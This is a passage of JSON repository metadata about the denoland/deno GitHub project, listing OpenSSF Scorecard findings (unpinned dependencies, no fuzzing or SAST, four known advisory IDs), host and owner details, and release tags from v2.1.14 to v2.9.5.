mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms